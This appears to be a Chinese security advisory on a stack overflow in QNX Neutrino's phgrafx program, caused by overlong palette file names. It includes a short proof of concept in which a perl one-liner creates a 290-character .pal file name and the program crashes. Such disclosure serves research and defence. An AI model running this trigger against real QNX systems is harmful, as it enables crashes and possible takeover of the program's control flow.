发布日期：2008-07-01
更新日期：2008-07-02

受影响系统：

QNX Neutrino RTOS 6.3.2
QNX Neutrino RTOS 6.3.0

描述：

---

BUGTRAQ  ID: 30024

QNX Neutrino RTOS是嵌入系统中所使用的实时操作系统。

QNX RTOS的/usr/photon/bin/phgrafx文件没有正确地处理PHOTON_PATH/palette/*.pal文件，如果用户在palette目录中创建了文件名大于285字符的.pal扩展名的话，就会触发栈溢出，允许攻击者完全控制程序流。

<*来源：Filipe Balestra （filipe@balestra.com.br）
  
  链接：http://marc.info/?l=bugtraq&m=121492463823645&w=2
        http://secunia.com/advisories/30808/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

# PHOTON_PATH=/tmp
# cd /tmp
# mkdir palette
# cd palette
# touch `perl -e 'print "A" x 290 . ".pal"'`
# /usr/photon/bin/phgrafx
Memory fault (core dumped)
#

建议：

---

厂商补丁：

QNX
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.qnx.com/

浏览次数：2524
严重程度：0（网友投票）